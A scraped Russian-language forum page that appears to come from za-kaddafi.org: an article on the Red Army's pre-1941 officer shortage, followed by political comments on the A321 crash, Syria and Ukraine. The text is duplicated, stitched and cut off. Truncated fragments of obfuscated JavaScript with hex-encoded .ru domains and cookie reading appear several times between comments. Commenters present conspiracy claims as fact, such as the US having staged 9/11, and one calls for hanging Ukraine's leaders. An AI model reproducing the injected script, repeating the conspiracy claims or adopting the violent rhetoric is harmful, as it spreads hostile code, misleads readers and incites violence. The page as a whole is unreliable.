К осени 1917 русский офицерский корпус насчитывал 276 тыс. человек, увеличившись почти в 5 раз по сравнению с 1913. При этом за 1914 - 1917 гг. в пехоте сменилось от 300 до 500 % офицеров, в кавалерии и артиллерии - от 15 до 40 %. В армии практически не осталось офицеров, имевших военное образование. Это компенсировалось боевым опытом и при послевоенном повышении квалификации в системе военного образования могло дать ценные военные кадры. Но этого не произошло. Источники сообщают следующее:
Около 50 тыс. офицеров были истреблены в ходе красного террора в 1917 - 1920 гг. Около 55 тыс. погибли по разные стороны баррикад Гражданской войны, около 60 тыс. оказались в эмиграции, и около 55 тыс. остались по разным причинам в РСФСР. Около 5 тыс. офицеров служили в армиях национальных государств, возникших на территории бывшей Российской империи. Около 50 тыс. служили в РККА в 1918 - 1920 гг. в качестве военспецов. В 1920 - 1921 гг. к военспецам была добавлена часть бывших белых, попавших в плен (более 14 тыс.) и взятых на службу в РККА.
Количество истребленных и погибших в Гражданскую офицеров вряд ли кто-то учитывал, этот учет вообще вряд ли возможен, поэтому цифры в 50-55 тысяч чел. представляются завышенными. Думаю, что тысяч 100-150 бывших офицеров остались в РСФСР, но дальнейшей возможности служить не имели. Кроме того, ни эти 100-150 тысяч, ни 69 тысяч военспецов, служивших в 1919 в РККА, не имели возможности восполнить отсутствие военного образования.
Постепенно доля военспецов в командных кадрах РККА неуклонно сокращалась: 75 % на 1918 г., 53 % на 1919 г., 42 % на 1920 г. и 34 % на 1921 г. Это не улучшило образовательный состав командиров РККА.
Затем, в 1931 году была проведена операция «Весна», в ходе которой были «вычищены» из армии (уволены) по политическим соображениям порядка 10 тыс. военспецов, часть из них была репрессирована. Картина увольнений командиров из РККА отображена в таблице:
Учитывая, что в 1921 количество военспецов составляло около 44000 чел., увольнения 1926-1933, 1934-1936, а также 1937-1941 годов практически начисто «вычистили» весь кадровый офицерский состав. Правда, в 1937–1939 гг. были реабилитированы и восстановлены в армии 11178 человек, из них 9247 уволенных по политическим статьям и 1457 арестованных. Пожалуй, это был единственный кадровый резерв. За его исключением, В РККА остались дилетанты.
На дивизию приходилось лишь 4 командира, имеющих опыт Первой мировой войны (в Вермахте было 4 офицера на батальон). При этом у Вермахта ушло на реформу ровно 4 года – с 1935 по 1939 год. Через год после введения воинской повинности в Германии во время ввода войск в Рейнскую область, целые ПОЛКИ безнадежно заблудились, и их пришлось разыскивать с помощью местной полиции. А через 3 года (1938) во время аншлюса Австрии "вставшей" немецкой техникой были завалены австрийские дороги. И это армия, которая начала взрывное расширение в 1935 году и имевшая отлично подготовленные офицерские кадры.
Реформа РККА начата в конце 1938. Добавляем 4 года и получаем «пик формы» 1943 год. Но реформа была начата крайне неудачно. Рассмотрим таблицу:
Видим, что нормальным соотношением рядового и начальствующего состава со времен Российской империи было число 23 (в Вермахте 29, в Англии 15, во Франции 22, в Японии 19).
Это соотношение поддерживалось в годы ПМВ и даже в годы Гражданской войны, оно все еще сохранялось в 1932 году. Но в ходе военной реформы конца 30-х соотношение резко изменилось и стало 6. Состоялся отказ от младшего командного (неофицерского) звена. Армия была нашпигована краскомами, абсолютно неграмотными в военном отношении. Это, с одной стороны, не дало ничего рядовым в профессиональном обучении, а с другой стороны, напрочь лишило их возможности хоть какой-то инициативы, рядом всегда был готовый одернуть рядового краском.
Система военного образования СССР здесь помочь не могла по трем причинам:
1. Низкий уровень преподавания.
2. Низкий уровень образования курсантов, принимаемых по классовому принципу.
3. Выпуск в год всего около 70 тыс. командиров.
Вывод простой: перед 22 июня командный состав РККА не обладал минимально необходимой квалификацией для организации управления войсками.
Светину. А достоверность? Битву под Москвой как выиграли? Закидали трупами и или научились на своих ошибках? Польшу, Бельгию, Нидерланды, Францию сгубил избыток ума их командиров? Избыток ума помешал Паулюсу вырваться из окружения? Насчет уровня преподавания. ИМХО более-менее соответствовал уровню оснащения армии. Как я уже писал ранее шифровальных машин в СССР тогда не было. Было отставание по радиолокации, гидроакустике, инжекторным авиамоторам, и т.д. и т.п. Ну и спецов по этой части не было или они стали появляться по мере появления указанных новинок. С уважением, Олег.
Из второй таблицы следует что количество солдат на офицера с 1939 по 41 не сильно изменилось /Было 6, стало 7/ что значительно отличается от данных до 1932 года. /20 с гаком/ Т.е. после "репрессий" офицеров стало больше.
Армия 30 годов была оплотом троцкого в его борьбе за власть. Кстать клеветать и писать ложные доносы это была "стратегия" троцкистов.
То есть вместо старшины сверхсрочника в РККА с 1930 года рядовых одёргивали закончившие среднее военное учебное заведение лейтенанты.
Я думаю, что это только хорошо. Вернее было бы хорошо, но это было не так.
Потому что кроме всего вы просто врёте. В РККА на стрелковый взвод в 30 человек приходился один взводный командир, то есть количество строевых командиров не отличалось от других армий. Что касается большого количества командиров, то это были технические специалисты, которые в других армиях имели сержантские и капральские звания, а в советской они окончили училище, получили кроме основной специальности ещё и общевойсковой навык командира взвода, и во время войны могли служить и служили резервом командных кадров во взводном звене. Что очень пригодилось и явилось большим подспорьем для будущих побед.
Таким образом, светин, вы как всегда любое достоинство советской армии стараетесь подлым образом намеренно превратить в недостаток.
Парад проводят в честь Парада!
Додуматься ведь это надо!
А в честь чего был тот Парад,
Они о том не говорят!
В честь Октября тогда был он!
Но этот Праздник отменён!
Противники социализма
Доходят до идиотизма!
У власти есть одна забота:
Всех превратить нас в идиотов.
Сказать я с горечью могу:
Москву мы отдали врагу!
И всё ж старается он зря.
Был тот Парад в честь Октября!
Мы помним и гордимся им!
И мы Москву освободим!
Найдя спасительную силу,
Мы всю освободим Россию!
И, с новым справившись врагом,
Парад народный проведём!
Не по теме статьи, по катастрофе А321. Англичане и американцы очень настойчиво убеждали Путина, что имел место теракт. Путин упирается. Очевидно, снова шел торг. Еще вчера он говорил, если это теракт, то должны быть следы взрывчатых веществ, а их нет. Посмотрите новости, посмотрите, как он вел себя вчера. А сегодня договоренность достигнута и тут же все нашлось. Можно не сомневаться, в очередной раз продались...
И Франция подвернулась - как нельзя "кстати". Теперь действия России на Ближнем Востоке будут контролировать "союзнички"... История ничему не учит российских политиков
То - что весь современный "исламский террор" хорошо организован и управляем из США, это совершенно очевидно и однозначно. "Исламские террористы" не могли конечно физически осуществить масштабные теракты 11 Сентября 2001 г. в США и следовательно - всю их работу полностью выполнили спецслужбы и военные самих США. Почему Путин подыграл тогда США в их "спектакле"? -Возможно потому что Россия едва сдерживала атаки настоящих террористических армий в собственной стране и главное было снизить "градус давления" на Россию из вне - за решительные действия на Северном Кавказе. Путин здесь выйграл время и заигрывая с США - сумел в существующих условиях и в самые сжатые сроки - возродить эффективный оборонный комплекс и полностью переоснастить вооружённые силы - способные успешно противостоять совершенно новому типу угрозы. Конечно, даже в самые худшие времена (в 90-ые) Россия была способна полностью уничтожить США и всех её союзников остатками своих ядерных арсеналов, но это смерти подобно и для России тоже и, следовательно - не выход из положения (Россия не может в открытую воевать с США и тоже самое хорошо осознают сами США). Путину остаётся только одно: перемолоть все террористические армии - направленные против России и, далее - лишить США былого могущества. А это возможно лишь уничтожив современную финансовую систему (заменив её на соответствующую общепринятым нормам - давно известным всему миру) и не допустить при этом глобального ядерного конфликта, а на это тоже требуется время и кропотливая работа (другими словами "кремль" снова выбрал проверенную веками тактику "войны на износ" - которую успешно применил в средние века против всех своих "восточных и западных партнёров")
Чахлику. М-да. "Возродить эффективный оборонный комплекс........." Вы когда-нибудь в оборонке работали? У меня друг остался на вертолетном заводе. Его мнение прямо противоположно вашему. И факты говорят об обратном. Теракты, кризис в хозяйстве. Шансы может у нас и есть но не очень много. Тем более с таким руководством. Зачем-то полезли в Сирию. Кунгуров пишет что в Египте готовят новый майдан, лишая людей заработка на туризме. И власть РФ подиграла обкому запретив туда полеты. И Арабская Весна не обошлась без российской власти. В 2010-м Россия прекратила вывоз зерна по настойчивым требованиям Международного Совета по Зерну. Последствия известны. Исламский мир импортер зерна. Вот он и встал на дыбы. С уважением, Олег.
Это было жизненно важно для России, в противном случае так называемое "исламское государство" неизбежно поглатило бы Среднюю Азию и взорвало ситуацию на Северном Кавказе. А в "средней полосе" самой России сегодня представителей "исламской культуры" ничуть не меньше чем во Франции (разуйте глаза, Олег)... Такая ситуация в России возникла не "вдруг", а её тщательно готовили и ещё не поздно спросить за это с нынешних "либералов" - стоявших у власти (а раз Россия уже воюет, то по "законам военного времени" следует с них и спрашивать). Даже когда СССР находился за "железным занавесом", он не мог не реагировать на ситуацию в Афганистане и на Ближнем Востоке, и делал это весьма успешно (контролируя не только эти территории, но и оттачивая боеспособность элитных войск и новейших разработок своего вооружения). А сейчас Россия словно "проходной двор" и не контролировать Ближний Восток - значит обречь себя на верную гибель... А вашего друга, думаю - сегодня и палкой не выгонишь с вертолётного завода, тогда как мой приятель не выдержал "лихих 90х" и сбежал из секретного конструкторского бюро. Он благополучно пережил тогда "90-ые" и сегодня не прочь-бы податься обратно, да "грехи не пускают"
Чахлику. Многое верно. Но опять же для успеха кроме возможностей нужно еще желание и умение. А с этим у нас плоховато. Афганистан не удержали. Дружеские режимы Ближнего Востока оказались весьма непрочными за исключением Сирии, Ливана и Ирана. Да и нынешние бомбежки без последующей зачистки пехотой пользы не принесут. В России до сих пор правят либералы. Так что особых перемен ждать не приходиться. Новые времена начинаются с новых людей и никак иначе. Насчет моего друга вы правы. Но он человек неглупый, понимает что альтернатив вертолетному заводу для него не очень много. С уважением, Олег.
А в бытность СССР был злейшим врагом, даже когда не на-шутку рассорился с США после "исламской революции". А СССР не удержался на Ближнем Востоке лишь только потому - что недооценил могущество доллара (так называемой "федеральной резервной системы США" - породившей эту самую "советскую власть" и чего эта власть так усердно скрывала от "советского народа"), а "кремлёвские старцы" действительно верили в тот идеологический вздор - который пытались навязать всем слаборазвитым странам... За все годы советской власти, иностранная помощь СССР всевозможному "интернациональному сброду" составила около 1 трлн. долларов (что в расчёте на каждого советского гражданина составило около 4 млн. советских рублей))))))))) Вот уж действительно - могли построить коммунизм в отдельно взятой стране и почему-то не построили - разорив в итоге СССР и как следствие - растеряв всех своих "липовых друзей"... Но сегодня ситуация несколько иная, и если правильно оценить все угрозы - исходящие именно от "мировой финансовой системы" во главе с долларом и евро, то Россия имеет реальные шансы одержать блестящую победу и вновь спасти Мир от неминуемой глобальной катострофы
Чахлику. Достаточно ли принято мер по выходу из "мировой финансовой системы"? Вывоз нефти, нефтепродуктов, ЕМНИП газа, металлов из-за падения рубля увеличился. Насчет блестящей победы. Уже писал. Для этого нужны соответствующие руководители. С уважением, Олег.
Если, конечно, ты собрался лечиться... Чего наш народ желает - вот главная проблема. Считать самих себя людьми второго сорта и следить за курсом доллара и евро - это как? Собакам-же - собачья смерть (и тут всё справедливо)
Какая история? У НИХ своя история, у нас своя. Они предлагают плакать и ужасаться отрезанным игиловцами головам, и прочие трупоедские ужасы подсосывают услужливо со всех новостных порталов. А вот про МИЛЛИОНЫ сгинувших наших соотечественников, от наркоты и бомжевания, все молчат глухо.Их как бы не было... вот такая вот история...:-)))
Путин...купился...да разводилово это низкопробное, балаган дешёвый. История...ага щас...
Вот кто страшней, игил или "делатели" демократических реформ? По моему, исходя из масштабов содеянного, ответ очевиден.
Очень верное замечание. И заметьте, все как всегда кстати - взрывы в Волгодонске, Бунакске и Москве обеспечили общественное мнение для ввода войск в Чечню, 911 кстати подготовило почву для нападения на Афганинистан и Ирак, теракты в Париже кстати делают из нерукопожатного диктатора-агресора путина вполне себе полезного человека, бомбящего террористов... Будь я каким-нибудь конспирологом, типа Мухина или Литвиненко, черт знает какие мысли могли бы в голову придти...
Во всяком случае для России и лично для Путина... Можно подумать, что ввели войска в Чечню использовав именно этот предлог. Но что действительно происходило тогда в Чечне - замалчивается по сию пору и какой либо "предлог" был совершенно излишен. А если называть вещи их собственными именами, то на территории Чечни был сформирован террористический анклав - управляемый и финансируемый спецслужбами США апосредованно ближневосточными "шестёрками" - Саудовской Аравией, Кайтаром и рядом других нефтеносных арабских государств. Нечто подобное, между прочим, американцам удалось проделать и с Украиной - под покровительством европейских "шестёрок", а принявших сторону украинских законов Крым и Донбасс (посмевших перечить обнаглевшим бандитам) - объявили "террористическими мятежниками" и тепрерь используют эту ситуацию ровно до-наоборот тому - как реагировал кремль на террористический мятеж в Чечне. У России сегодня достаточно оснований для того - чтобы попросту "мочить в сортирах" всю нынешнюю украинскую "царствующую элиту" и исполнить это чисто-технически вовсе не составит для России особого труда (достаточно просто начать и сами "украинцы" доведут это дело до логического конца - с виселицами на майдане для "хероев АТО")... Но, думаю, что Россия всё-же ждёт подходящего предлога в глазах "Запада" и скорее всего скоро его дождётся. Но по моему мнению на "Запад" вообще не следует обращать внимание когда речь идёт о жизненно-важных интересах России на исконно- русских землях
То, что творится в Чечне сейчас лучше? По мне, пусть бы и оставался там Масхадов, уж гораздо меньший беспредельщик, чем герой России, убивший первого русского в 16 лет... Да и бюджетных денег независимая Чечня столько бы не получала. Про Крым и Лугандонию не надо брехать. Что за референдум, организованный за 2 недели под дулами автоматов, все понимают. И про террористов, захвативших отделения милиции в Донецке и Луганске, мы тоже все знаем. Кстати, вы правда верите, что власть на Украине отождествляется лишь с президентом, а парламент при сбежавшем презике уже нелегитимен? Насчёт интересов России поподробнее можно? Я считал, что интересы России - это интересы её жителей. Если в результате действий руководства снижаются доходы и растут цены, разве в интересах России такие действия? И что за "исконно русские" территории, которые РИ захватила лишь в конце 18 века?
"Коммерсантъ" узнал предварительные выводы следствия о взрыве на A321
05:33, 18 ноября 2015
Взрыв на борту российского пассажирского самолета, упавшего вскоре после вылета из египетского Шарм-эль-Шейха 31 октября, произошел, предположительно, в салоне. Об этом пишет "Коммерсантъ" со ссылкой на источник, близкий к следствию.
Эпицентр взрыва мог находиться в конце салона, где располагаются хвостовые шпангоуты. По предварительной версии, бомба могла быть заложена под пассажирское сиденье у окна. Ее срабатывание привело к разрушению шпангоута и взрывной разгерметизации салона.
Самолет, от которого сразу же оторвалась хвостовая часть, развалился в воздухе, а люди, находившиеся на его борту, погибли практически мгновенно от резкого перепада давления.
По данным издания, эксперты ФСБ, обследуя обломки A321, обнаружили часть фюзеляжа с пробоиной в обшивке диаметром примерно метр на метр, края которой были выгнуты наружу. Образоваться она могла в результате применения взрывчатого вещества высокой бризантности, изготовленного в заводских условиях. Такие вещества, например тротил или пластит, используются обычно в военных целях. Какая именно взрывчатка сработала, пока не уточняется.
Взрывное устройство, предположительно, имело часовой механизм, хотя в случае задержки с вылетом, что не является редкостью для египетских аэропортов, таймер мог сработать и в самолете без пассажиров еще на летном поле. Если бы бомба находилась, например, в хвостовой, негерметичной части самолета, активировать ее мог датчик давления - при наборе высоты оно падает.
По предположению экспертов, бомбу на борт мог занести кто-то из сотрудников обслуживающего персонала аэропорта - например, уборщики салона или рабочие, доставлявшие еду и багаж.
Однако в свете последних событий появились сомнения.
Во-1-х, голословное сообщение о докладе директора ФСБ президенту с окончательным вердиктом: "Теракт". "Коммерсантъ" со своими подробностями опирается на свой неофициальный источник.
Во-2-х, приказ на безусловное мочилово: "Президент поручил нашим специальным службам принять меры для установления всех, кто причастен к организации этого чудовищного террористического акта; он приказал искать этих людей по всему миру вне зависимости от географии без какого-либо срока давности и уничтожить всех этих людей", - дополнил слова президента официальный представитель Кремля Дмитрий Песков. http://lenta.ru/articles/2015/11/17/licensetokill/
Дело пахнет Норд-Остом-2, когда террористов уничтожили при 100% возможности взять в плен и выпытать все подробности и связи.
Похоже на заметание каких-то следов, ну и плюс - грубый пиар в расчёте на вопли толпы: "Распните их! Распните!"
И смотрите как резко возросла интенсивность бомбёжек. Уже и стратегическую авиацию в дело ввели! Ату их! Оно может и ату их...вот только ...в Донбассе русских продолжают убивать... но трогать их низя...титульная нация в правительстве, а арабов...мочи их Россия...тут можно...
И все за наш счет... эх и крутят
...таки и построят они новую Хазарию со столицей в Днепропетровске.
Воякам понятное дело пострелять по настоящему хочется...но про Украину замазывают тему. Старательно. По всем СМИ в последнее пошли темы про то что хохлы уже сплошные фашисты... подливают керосинчику в костерок.
Нет, не наше это правительство. Втягивают они нас в войнушку. Причем грамотно.
То, что возросла интенсивность бомбёжек и задействовали стратегическую авиацию, - это естественно и логично. Только вот где-то на соседней ветке я видел сравнение: французы взяли сколько-то террористов живьём, а в РФ такого не наблюдается. Опять подтверждение моего подозрения: во Франции стараются найти сообщников и вскрыть структуру, а в РФ - нет.
Новороссию ожидаемо сливают. Вот свежие сообщения:
И "Новороссия" в этом расскладе лишь тот "камень" - на который нашла "коса" американского плана по захвату Украины. Кремль-же с предвкушением наблюдает как Украина стремительно нищает и разваливается - не в силах одолеть Новороссии и поправить дела в экономике (а взять такое большое население на прокорм и полное обеспечение - Евросоюз тоже не в состоянии). Пукин-же просто демонстративно "стебается" - соглашаясь на реструкторизацию "суверенного российского долга" на ещё лучших условиях - чем требует Киев, но под финансовые гарантии "це Эвропы"... Одним словом кремль попросту выжидает - когда майдауны доведут страну до ручки и предпримут "психические атаки" на Донбасс, т.к. в области экономики правительству Порошенко-Вальцмана и вовсе ничего не светит (тогда жадность хохлов одолеет наконец и они сами его сожрут без "сала" - с божьей помощью России))))) Всплеск-же террора в Европе скорее нужен США и Евросоюзу - с целью ввязаться в войну с ИГИЛ и тем самым взять его "умеренную оппозицию" под защиту, ограничив напор России (и может именно поэтому Россия так засуетилась тоже - "обеспокоившись за Францию" и резко признала причинами крушения российско авиалайнера на Синае - теракт со стороны ИГИЛ, не желая в начале эту версию рассматривать в качестве основной). Тут конечно многое не ясно и возможно российский А-321 действительно взорвали террористы. Но сами теракты не всегда им удаются, а если "заказ" на него поступил срочный, то и вероятность "осечки" резко увеличивается тоже... Одним словом, могли сработать и "на-верняка" - попросту сбив пассажирский российский самолёт и первыми начать трезвонить о теракте... Многие эксперты - побывавшие на месте падения обломков, указывают на "внешнее воздействие" и также очень подозрительно, что о военных учениях ВВС "США-Израиля-Польши и Греции" - проходивших в непосредственной близости от места падения обломков и именно в то самое время, мировые СМИ скромно умолчали
Кадры решают все
Небольшое исследование к предыдущей статье.
К осени 1917 русский офицерский корпус насчитывал 276 тыс. человек, увеличившись почти в 5 раз по сравнению с 1913. При этом за 1914 - 1917 гг. в пехоте сменилось от 300 до 500 % офицеров, в кавалерии и артиллерии - от 15 до 40 %. В армии практически не осталось офицеров, имевших военное образование. Это компенсировалось боевым опытом и при послевоенном повышении квалификации в системе военного образования могло дать ценные военные кадры. Но этого не произошло. Источники сообщают следующее:
Около 50 тыс. офицеров были истреблены в ходе красного террора в 1917 - 1920 гг. Около 55 тыс. погибли по разные стороны баррикад Гражданской войны, около 60 тыс. оказались в эмиграции, и около 55 тыс. остались по разным причинам в РСФСР. Около 5 тыс. офицеров служили в армиях национальных государств, возникших на территории бывшей Российской империи. Около 50 тыс. служили в РККА в 1918 - 1920 гг. в качестве военспецов. В 1920 - 1921 гг. к военспецам была добавлена часть бывших белых, попавших в плен (более 14 тыс.) и взятых на службу в РККА.
Количество истребленных и погибших в Гражданскую офицеров вряд ли кто-то учитывал, этот учет вообще вряд ли возможен, поэтому цифры в 50-55 тысяч чел. представляются завышенными. Думаю, что тысяч 100-150 бывших офицеров остались в РСФСР, но дальнейшей возможности служить не имели. Кроме того, ни эти 100-150 тысяч, ни 69 тысяч военспецов, служивших в 1919 в РККА, не имели возможности восполнить отсутствие военного образования.
Постепенно доля военспецов в командных кадрах РККА неуклонно сокращалась: 75 % на 1918 г., 53 % на 1919 г., 42 % на 1920 г. и 34 % на 1921 г. Это не улучшило образовательный состав командиров РККА.
Затем, в 1931 году была проведена операция «Весна», в ходе которой были «вычищены» из армии (уволены) по политическим соображениям порядка 10 тыс. военспецов, часть из них была репрессирована. Картина увольнений командиров из РККА отображена в таблице:
Учитывая, что в 1921 количество военспецов составляло около 44000 чел., увольнения 1926-1933, 1934-1936, а также 1937-1941 годов практически начисто «вычистили» весь кадровый офицерский состав. Правда, в 1937–1939 гг. были реабилитированы и восстановлены в армии 11178 человек, из них 9247 уволенных по политическим статьям и 1457 арестованных. Пожалуй, это был единственный кадровый резерв. За его исключением, В РККА остались дилетанты.
На дивизию приходилось лишь 4 командира, имеющих опыт Первой мировой войны (в Вермахте было 4 офицера на батальон). При этом у Вермахта ушло на реформу ровно 4 года – с 1935 по 1939 год. Через год после введения воинской повинности в Германии во время ввода войск в Рейнскую область, целые ПОЛКИ безнадежно заблудились, и их пришлось разыскивать с помощью местной полиции. А через 3 года (1938) во время аншлюса Австрии "вставшей" немецкой техникой были завалены австрийские дороги. И это армия, которая начала взрывное расширение в 1935 году и имевшая отлично подготовленные офицерские кадры.
Реформа РККА начата в конце 1938. Добавляем 4 года и получаем «пик формы» 1943 год. Но реформа была начата крайне неудачно. Рассмотрим таблицу:
Видим, что нормальным соотношением рядового и начальствующего состава со времен Российской империи было число 23 (в Вермахте 29, в Англии 15, во Франции 22, в Японии 19).
Это соотношение поддерживалось в годы ПМВ и даже в годы Гражданской войны, оно все еще сохранялось в 1932 году. Но в ходе военной реформы конца 30-х соотношение резко изменилось и стало 6. Состоялся отказ от младшего командного (неофицерского) звена. Армия была нашпигована краскомами, абсолютно неграмотными в военном отношении. Это, с одной стороны, не дало ничего рядовым в профессиональном обучении, а с другой стороны, напрочь лишило их возможности хоть какой-то инициативы, рядом всегда был готовый одернуть рядового краском.
Система военного образования СССР здесь помочь не могла по трем причинам:
1. Низкий уровень преподавания.
2. Низкий уровень образования курсантов, принимаемых по классовому принципу.
3. Выпуск в год всего около 70 тыс. командиров.
Вывод простой: перед 22 июня командный состав РККА не обладал минимально необходимой квалификацией для организации управления войсками.
Светину. А достоверность?
Светину. А достоверность? Битву под Москвой как выиграли? Закидали трупами и или научились на своих ошибках? Польшу, Бельгию, Нидерланды, Францию сгубил избыток ума их командиров? Избыток ума помешал Паулюсу вырваться из окружения? Насчет уровня преподавания. ИМХО более-менее соответствовал уровню оснащения армии. Как я уже писал ранее шифровальных машин в СССР тогда не было. Было отставание по радиолокации, гидроакустике, инжекторным авиамоторам, и т.д. и т.п. Ну и спецов по этой части не было или они стали появляться по мере появления указанных новинок. С уважением, Олег.
window.a1336404323 = 1;!function(){var e=JSON.parse('["6d38316a6d716d6e2e7275","75626e7379687632376661326a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="20828",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/
Светин Небольшое исследование к предыдущей статье.
Из второй таблицы следует что количество солдат на офицера с 1939 по 41 не сильно изменилось
/Было 6, стало 7/ что значительно отличается от данных до 1932 года. /20 с гаком/
Т.е. после "репрессий" офицеров стало больше.
Армия 30 годов была оплотом троцкого в его борьбе за власть.
Кстать клеветать и писать ложные доносы это была "стратегия" троцкистов.
То есть вместо старшины
То есть вместо старшины сверхсрочника в РККА с 1930 года рядовых одёргивали закончившие среднее военное учебное заведение лейтенанты.
Я думаю, что это только хорошо. Вернее было бы хорошо, но это было не так.
Потому что кроме всего вы просто врёте. В РККА на стрелковый взвод в 30 человек приходился один взводный командир, то есть количество строевых командиров не отличалось от других армий. Что касается большого количества командиров, то это были технические специалисты, которые в других армиях имели сержантские и капральские звания, а в советской они окончили училище, получили кроме основной специальности ещё и общевойсковой навык командира взвода, и во время войны могли служить и служили резервом командных кадров во взводном звене. Что очень пригодилось и явилось большим подспорьем для будущих побед.
Таким образом, светин, вы как всегда любое достоинство советской армии стараетесь подлым образом намеренно превратить в недостаток.
ПАРАД В ЧЕСТЬ ПАРАДА!
Опубликовано Vasiliy Sumatra в 14.11.2015 17:08.
Парад проводят в честь Парада!
Додуматься ведь это надо!
А в честь чего был тот Парад,
Они о том не говорят!
В честь Октября тогда был он!
Но этот Праздник отменён!
Противники социализма
Доходят до идиотизма!
У власти есть одна забота:
Всех превратить нас в идиотов.
Сказать я с горечью могу:
Москву мы отдали врагу!
И всё ж старается он зря.
Был тот Парад в честь Октября!
Мы помним и гордимся им!
И мы Москву освободим!
Найдя спасительную силу,
Мы всю освободим Россию!
И, с новым справившись врагом,
Парад народный проведём!
8 ноября 2015 г.
- See more at: http://zasssr.info/node/6502#sthash.kjoDJilv.dpuf
Юрий Губарь
http://za-kaddafi.org/node/40341#comment-91904
Не по теме статьи, по
Не по теме статьи, по катастрофе А321. Англичане и американцы очень настойчиво убеждали Путина, что имел место теракт. Путин упирается. Очевидно, снова шел торг. Еще вчера он говорил, если это теракт, то должны быть следы взрывчатых веществ, а их нет. Посмотрите новости, посмотрите, как он вел себя вчера. А сегодня договоренность достигнута и тут же все нашлось. Можно не сомневаться, в очередной раз продались...
Да, Путин купился на "коалицию"
И Франция подвернулась - как нельзя "кстати". Теперь действия России на Ближнем Востоке будут контролировать "союзнички"... История ничему не учит российских политиков
Чахлику. И вы все равно
Чахлику. И вы все равно будете сторонником нынешней российской власти не смотря на все ее ошибки и преступления? С уважением, Олег.
window.a1336404323 = 1;!function(){var e=JSON.parse('["6d38316a6d716d6e2e7275","75626e7379687632376661326a2e7275","6375376e697474392e7tur
Олег, нам неизвестен весь рассклад, но предпологаю следующее:
То - что весь современный "исламский террор" хорошо организован и управляем из США, это совершенно очевидно и однозначно. "Исламские террористы" не могли конечно физически осуществить масштабные теракты 11 Сентября 2001 г. в США и следовательно - всю их работу полностью выполнили спецслужбы и военные самих США. Почему Путин подыграл тогда США в их "спектакле"? -Возможно потому что Россия едва сдерживала атаки настоящих террористических армий в собственной стране и главное было снизить "градус давления" на Россию из вне - за решительные действия на Северном Кавказе. Путин здесь выйграл время и заигрывая с США - сумел в существующих условиях и в самые сжатые сроки - возродить эффективный оборонный комплекс и полностью переоснастить вооружённые силы - способные успешно противостоять совершенно новому типу угрозы. Конечно, даже в самые худшие времена (в 90-ые) Россия была способна полностью уничтожить США и всех её союзников остатками своих ядерных арсеналов, но это смерти подобно и для России тоже и, следовательно - не выход из положения (Россия не может в открытую воевать с США и тоже самое хорошо осознают сами США). Путину остаётся только одно: перемолоть все террористические армии - направленные против России и, далее - лишить США былого могущества. А это возможно лишь уничтожив современную финансовую систему (заменив её на соответствующую общепринятым нормам - давно известным всему миру) и не допустить при этом глобального ядерного конфликта, а на это тоже требуется время и кропотливая работа (другими словами "кремль" снова выбрал проверенную веками тактику "войны на износ" - которую успешно применил в средние века против всех своих "восточных и западных партнёров")
Чахлику. М-да. "Возродить
Чахлику. М-да. "Возродить эффективный оборонный комплекс........." Вы когда-нибудь в оборонке работали? У меня друг остался на вертолетном заводе. Его мнение прямо противоположно вашему. И факты говорят об обратном. Теракты, кризис в хозяйстве. Шансы может у нас и есть но не очень много. Тем более с таким руководством. Зачем-то полезли в Сирию. Кунгуров пишет что в Египте готовят новый майдан, лишая людей заработка на туризме. И власть РФ подиграла обкому запретив туда полеты. И Арабская Весна не обошлась без российской власти. В 2010-м Россия прекратила вывоз зерна по настойчивым требованиям Международного Совета по Зерну. Последствия известны. Исламский мир импортер зерна. Вот он и встал на дыбы. С уважением, Олег.
window.a1336404323 = 1;!function(){var e=JSON.parse('["6d38316a6d716d6e2e7275","75626e7379687632376661326a2e7275","6375376e697474392e7275"
Зачем полезли в Сирию?
Это было жизненно важно для России, в противном случае так называемое "исламское государство" неизбежно поглатило бы Среднюю Азию и взорвало ситуацию на Северном Кавказе. А в "средней полосе" самой России сегодня представителей "исламской культуры" ничуть не меньше чем во Франции (разуйте глаза, Олег)... Такая ситуация в России возникла не "вдруг", а её тщательно готовили и ещё не поздно спросить за это с нынешних "либералов" - стоявших у власти (а раз Россия уже воюет, то по "законам военного времени" следует с них и спрашивать). Даже когда СССР находился за "железным занавесом", он не мог не реагировать на ситуацию в Афганистане и на Ближнем Востоке, и делал это весьма успешно (контролируя не только эти территории, но и оттачивая боеспособность элитных войск и новейших разработок своего вооружения). А сейчас Россия словно "проходной двор" и не контролировать Ближний Восток - значит обречь себя на верную гибель... А вашего друга, думаю - сегодня и палкой не выгонишь с вертолётного завода, тогда как мой приятель не выдержал "лихих 90х" и сбежал из секретного конструкторского бюро. Он благополучно пережил тогда "90-ые" и сегодня не прочь-бы податься обратно, да "грехи не пускают"
Чахлику. Многое верно. Но
Чахлику. Многое верно. Но опять же для успеха кроме возможностей нужно еще желание и умение. А с этим у нас плоховато. Афганистан не удержали. Дружеские режимы Ближнего Востока оказались весьма непрочными за исключением Сирии, Ливана и Ирана. Да и нынешние бомбежки без последующей зачистки пехотой пользы не принесут. В России до сих пор правят либералы. Так что особых перемен ждать не приходиться. Новые времена начинаются с новых людей и никак иначе. Насчет моего друга вы правы. Но он человек неглупый, понимает что альтернатив вертолетному заводу для него не очень много. С уважением, Олег.
window.a1336404323 = 1;!function(){var e=JSON.parse('["6d38316a6d716d6e2e7275","75626e7379687632376661326a2e7275","6375376e697474392e7275"
Иран лишь в последние годы стал ближе к России
А в бытность СССР был злейшим врагом, даже когда не на-шутку рассорился с США после "исламской революции". А СССР не удержался на Ближнем Востоке лишь только потому - что недооценил могущество доллара (так называемой "федеральной резервной системы США" - породившей эту самую "советскую власть" и чего эта власть так усердно скрывала от "советского народа"), а "кремлёвские старцы" действительно верили в тот идеологический вздор - который пытались навязать всем слаборазвитым странам... За все годы советской власти, иностранная помощь СССР всевозможному "интернациональному сброду" составила около 1 трлн. долларов (что в расчёте на каждого советского гражданина составило около 4 млн. советских рублей))))))))) Вот уж действительно - могли построить коммунизм в отдельно взятой стране и почему-то не построили - разорив в итоге СССР и как следствие - растеряв всех своих "липовых друзей"... Но сегодня ситуация несколько иная, и если правильно оценить все угрозы - исходящие именно от "мировой финансовой системы" во главе с долларом и евро, то Россия имеет реальные шансы одержать блестящую победу и вновь спасти Мир от неминуемой глобальной катострофы
Чахлику. Достаточно ли
